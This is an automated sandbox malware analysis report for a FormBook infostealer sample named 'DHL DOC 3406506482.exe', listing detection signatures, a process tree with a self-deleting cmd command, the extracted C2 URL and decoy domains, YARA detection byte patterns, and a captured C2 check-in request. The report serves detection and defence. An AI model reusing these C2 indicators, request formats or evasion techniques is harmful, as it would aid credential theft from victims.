
Windows Analysis Report DHL DOC 3406506482.exe

Overview

General Information

Sample Name: DHL DOC 3406506482.exe
Analysis ID: 532855
MD5: 896c3c7f309a479f0ab1a9d8693b130f
SHA1: 9ad094b6799fb6deea1d2c3704576db3353d70ae
SHA256: 6f35f7c071de6ed456c189e023daa27c5b0cd007d4fcddbb13316a82ada83abe
Tags: DHL, exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • DHL DOC 3406506482.exe (PID: 4824 cmdline: "C:\Users\user\Desktop\DHL DOC 3406506482.exe" MD5: 896C3C7F309A479F0AB1A9D8693B130F)
    • DHL DOC 3406506482.exe (PID: 3488 cmdline: C:\Users\user\Desktop\DHL DOC 3406506482.exe MD5: 896C3C7F309A479F0AB1A9D8693B130F)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 1004 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 4140 cmdline: /c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.verdugofarms.com/q35x/"], "decoy": ["86ffd.com", "riquelmetaylor.com", "web3media.xyz", "lesbian-kyonyu.net", "assurancestreet.com", "giftboxpromos.com", "3exnck.com", "androidgays.com", "eduexsoft.com", "bmtmarmall.com", "mstrevent.com", "suvyco.link", "urautloads.com", "peaacockrv.com", "stanefree.com", "ybcxzgnmu.com", "pittsburgh-pestcontrol-co.com", "thesecond-handrose.com", "otcovotakkia.quest", "josephinesart.com", "uenpb.xyz", "gzczjsfg.com", "emptybestliving.com", "thecripsarena.com", "1688bfb.com", "garymullin.com", "socialteers-millunu.com", "zapf-nachhilfe.com", "expressportaldeliveryline.com", "hobbydiscover.store", "qncqroup.com", "housepainteroshawa.com", "craftedbycharter.com", "sushibaraustin.com", "kjjsclosets.com", "leylaatakan.com", "luminbowstore.com", "autoauctioncenter.com", "bon-da.com", "spilledreviews.com", "hbtysj.com", "truthrevealedtv.com", "gmcanchorage.com", "kirbycarpet.com", "ambire.email", "awonky.com", "giannagragnani.com", "infomw-abogados.com", "summit-mulundwest.info", "omradesutveckling.com", "jennypennybeachboutique.com", "medicalmarijuana.quest", "tusjentagal.quest", "zghglw.com", "bmcq1.com", "counsellinggta.com", "econnect.club", "xn--42cgr3fjyvj4c9a.com", "wed8029.com", "jeweleryshowcase.com", "ketofam.com", "roiward.tech", "artemi.club", "maddocksmedia.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(31 memory dump entries in total; the remaining entries are not shown here.)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(17 unpacked PE entries in total; the remaining entries are not shown here.)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: DHL DOC 3406506482.exe, Virustotal: Detection: 29%
Source: DHL DOC 3406506482.exe, ReversingLabs: Detection: 37%
Yara detected FormBook
Source: Yara match, File source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: DHL DOC 3406506482.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: DHL DOC 3406506482.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: explorer.pdbUGP, source: DHL DOC 3406506482.exe, 00000001.00000002.317544821.00000000033E0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP, source: DHL DOC 3406506482.exe, 00000001.00000002.316428940.000000000106F000.00000040.00000001.sdmp, DHL DOC 3406506482.exe, 00000001.00000002.316230194.0000000000F50000.00000040.00000001.sdmp, explorer.exe, 0000000E.00000002.514321960.00000000049E0000.00000040.00000001.sdmp, explorer.exe, 0000000E.00000002.514487240.0000000004AFF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: DHL DOC 3406506482.exe, 00000001.00000002.316428940.000000000106F000.00000040.00000001.sdmp, DHL DOC 3406506482.exe, 00000001.00000002.316230194.0000000000F50000.00000040.00000001.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.514321960.00000000049E0000.00000040.00000001.sdmp, explorer.exe, 0000000E.00000002.514487240.0000000004AFF000.00000040.00000001.sdmp
Source: Binary string: explorer.pdb, source: DHL DOC 3406506482.exe, 00000001.00000002.317544821.00000000033E0000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe, Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 1.32.255.152:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 1.32.255.152:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 1.32.255.152:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.uenpb.xyz
Source: C:\Windows\explorer.exe, Network Connect: 1.32.255.152 80
Source: C:\Windows\explorer.exe, Domain query: www.wed8029.com
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe, DNS query: www.uenpb.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.verdugofarms.com/q35x/
Source: Joe Sandbox View, ASN Name: BCPL-SGBGPNETGlobalASNSG
Source: global traffic, HTTP traffic detected: GET /q35x/?1bL4BX=n0W6sBJt6o5hFrgQrmHErIHHCJqVSMT16xl2hKdZI7rsj0AVnZwRK3Rm3lIsVsqUahNr&TBZ8=3fcPMN HTTP/1.1 | Host: www.uenpb.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 02 Dec 2021 17:56:34 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: unknown, DNS traffic detected: queries for: www.wed8029.com

E-Banking Fraud:

Yara detected FormBook
Source: Yara match (same unpacked PE and memory dump sources as listed under AV Detection above)

System Summary:

Malicious sample detected (through community Yara rule)
Source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: DHL DOC 3406506482.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
